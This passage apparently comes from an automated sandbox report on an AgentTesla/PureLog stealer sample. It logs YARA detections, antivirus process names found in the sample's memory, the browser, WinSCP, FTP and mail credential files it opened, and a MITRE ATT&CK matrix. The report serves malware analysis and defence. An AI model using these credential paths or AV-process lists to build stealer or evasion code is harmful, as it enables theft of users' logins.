                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CF920C GetLocalTime,0_2_02CF920C
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_006E8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,13_2_006E8550
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02CFB78C GetVersionExA,0_2_02CFB78C
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                    Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 00000020.00000002.1832128642.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1832128642.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Native_neworigin.exe PID: 3976, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.4f70000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.2b66216.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.3f3c190.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.3ee5570.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.3f3c190.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3ecc190.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2ab6216.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.4f70f08.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3e75570.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.3ee5570.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.4f70000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.6e0950.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.2b6711e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.6e1858.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.5120000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.4f70f08.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.3.Native_neworigin.exe.8e7630.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.6e1858.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5010000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2ab6216.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.3.Native_neworigin.exe.78d220.17.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3ecc190.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2ab711e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.6e1858.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3e75570.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.3.Native_neworigin.exe.78d220.17.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.59e0000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.6e1858.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.2b66216.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.3ee6478.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5010000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.5120f08.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.3ee6478.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3e76478.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.5120000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.3.Native_neworigin.exe.8e7630.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.5120f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.2b6711e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3e76478.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.6e0950.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2ab711e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1821621079.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1846740962.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000003.1632645650.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000003.1630416908.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000003.1460268947.000000000078D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1712231989.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1845358079.0000000003E75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.1748806295.00000000008E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1781418766.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1746628471.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1852623141.0000000005010000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 00000020.00000002.1832128642.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Native_neworigin.exe PID: 3976, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 00000020.00000002.1832128642.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1832128642.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Native_neworigin.exe PID: 3976, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.4f70000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.2b66216.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.3f3c190.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.3ee5570.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.3f3c190.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3ecc190.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2ab6216.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.4f70f08.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3e75570.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.3ee5570.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.4f70000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.6e0950.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.2b6711e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.6e1858.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.5120000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.4f70f08.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.3.Native_neworigin.exe.8e7630.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.6e1858.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5010000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2ab6216.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.3.Native_neworigin.exe.78d220.17.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3ecc190.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2ab711e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.6e1858.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3e75570.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.3.Native_neworigin.exe.78d220.17.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.59e0000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.6e1858.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.2b66216.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.3ee6478.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5010000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.5120f08.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.3ee6478.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3e76478.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.5120000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.3.Native_neworigin.exe.8e7630.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.5120f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Native_neworigin.exe.2b6711e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3e76478.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.6e0950.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2ab711e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1821621079.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1846740962.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000003.1632645650.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000003.1630416908.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000003.1460268947.000000000078D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1712231989.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1845358079.0000000003E75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.1748806295.00000000008E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1781418766.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1746628471.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1852623141.0000000005010000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts                    		121
                    Windows Management Instrumentation                    		2
                    LSASS Driver                    		2
                    LSASS Driver                    		21
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    System Time Discovery                    		1
                    Taint Shared Content                    		11
                    Archive Collected Data                    		3
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts11
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Shared Modules                    		1
                    Valid Accounts                    		1
                    Valid Accounts                    		4
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		1
                    System Network Connections Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts3
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Access Token Manipulation                    		11
                    Software Packing                    		NTDS3
                    File and Directory Discovery                    		Distributed Component Object Model21
                    Input Capture                    		4
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Windows Service                    		1
                    Timestomp                    		LSA Secrets47
                    System Information Discovery                    		SSH1
                    Clipboard Data                    		125
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable Media2
                    Service Execution                    		21
                    Registry Run Keys / Startup Folder                    		311
                    Process Injection                    		1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Query Registry                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                    Scheduled Task/Job                    		1
                    File Deletion                    		DCSync261
